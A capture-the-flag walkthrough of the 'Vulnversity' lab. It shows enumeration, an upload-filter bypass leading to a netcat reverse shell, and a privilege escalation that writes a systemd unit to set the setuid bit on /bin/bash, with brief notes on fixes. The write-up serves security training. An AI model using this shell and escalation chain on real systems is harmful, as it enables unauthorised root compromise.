Esharmaji Walkthrough Vulniversity
Esharmaji Walkthrough Vulniversity
Enumeration:
nmap -sC -sV 10.10.170.189 -oN initial
(root EthicalSharmaji)-[~/THMOSCPPath/vulnuniv]
└─# gobuster dir -u http://10.10.170.189:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobust.txt
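Uploads with a .php extension are rejected, so other extensions found through a Google search were tested. That one of them was accepted (see below) suggests the upload filter is an extension blocklist, which is not a reliable control; an allowlist of expected file types is the usual fix.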
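The file uploaded successfully. Enumerating for the upload directory found it at /internal/uploads. Because uploaded files are served from a web-accessible path where the server executes them, the upload becomes code execution as the web-server user; uploads belong outside the web root or in a location with script handling disabled.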
──(root EthicalSharmaji)-[~/THMOSCPPath/vulnuniv]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [10.17.41.167] from (UNKNOWN) [10.10.170.189] 45306
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
13:20:27 up 1:41, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ ls -al
total 96
drwxr-xr-x 23 root root 4096 Jul 31 2019 .
drwxr-xr-x 23 root root 4096 Jul 31 2019 ..
drwxr-xr-x 2 root root 4096 Jul 31 2019 bin
drwxr-xr-x 3 root root 4096 Jul 31 2019 boot
drwxr-xr-x 17 root root 3700 Mar 16 11:39 dev
drwxr-xr-x 98 root root 4096 Aug 1 2019 etc
drwxr-xr-x 3 root root 4096 Jul 31 2019 home
lrwxrwxrwx 1 root root 33 Jul 31 2019 initrd.img -> boot/initrd.img-4.4.0-142-generic
drwxr-xr-x 22 root root 4096 Jul 31 2019 lib
drwxr-xr-x 2 root root 4096 Jul 31 2019 lib64
drwx------ 2 root root 16384 Jul 31 2019 lost+found
drwxr-xr-x 3 root root 4096 Jul 31 2019 media
drwxr-xr-x 2 root root 4096 Feb 26 2019 mnt
drwxr-xr-x 2 root root 4096 Feb 26 2019 opt
dr-xr-xr-x 137 root root 0 Mar 16 11:38 proc
drwx------ 4 root root 4096 Jul 31 2019 root
drwxr-xr-x 28 root root 980 Mar 16 11:39 run
drwxr-xr-x 2 root root 12288 Jul 31 2019 sbin
drwxr-xr-x 2 root root 4096 Jul 31 2019 snap
drwxr-xr-x 3 root root 4096 Jul 31 2019 srv
dr-xr-xr-x 13 root root 0 Mar 16 11:38 sys
drwxrwxrwt 8 root root 4096 Mar 16 13:17 tmp
drwxr-xr-x 10 root root 4096 Jul 31 2019 usr
drwxr-xr-x 14 root root 4096 Jul 31 2019 var
lrwxrwxrwx 1 root root 30 Jul 31 2019 vmlinuz -> boot/vmlinuz-4.4.0-142-generic
$ cd /home
$ ls
bill
$ cd bill
$ ls
user.txt
$ whoami && cat user.txt && ifconfig
www-data
8bd7992fbe8a6ad*****(Intentionally * added)
eth0 Link encap:Ethernet HWaddr 02:5e:bb:59:0d:97
inet addr:10.10.170.189 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::5e:bbff:fe59:d97/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:96350 errors:0 dropped:0 overruns:0 frame:0
TX packets:94946 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:6669760 (6.6 MB) TX bytes:24660136 (24.6 MB)
Privilege Escalation:
$ uname -a
Linux vulnuniversity 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
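Reference for the systemctl technique used below: https://gtfobins.github.io/gtfobins/systemctl/
The link and enable steps below succeed for www-data, which indicates systemctl runs with elevated privileges on this host (presumably a setuid bit); that is the misconfiguration to look for and remove when hardening.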
www-data@vulnuniversity:/home/bill$ TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
TF=$(mktemp).service
www-data@vulnuniversity:/home/bill$ echo '[Service]
> Type=oneshot
> ExecStart=/bin/sh -c "chmod +s /bin/bash"
> [Install]
> WantedBy=multi-user.target' > $TF
www-data@vulnuniversity:/home/bill$ /bin/systemctl link $TF
Created symlink from /etc/systemd/system/tmp.gzegTgkVSR.service to /tmp/tmp.gzegTgkVSR.service.
www-data@vulnuniversity:/home/bill$
/bin/systemctl enable --now $TF
Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.gzegTgkVSR.service to /tmp/tmp.gzegTgkVSR.service.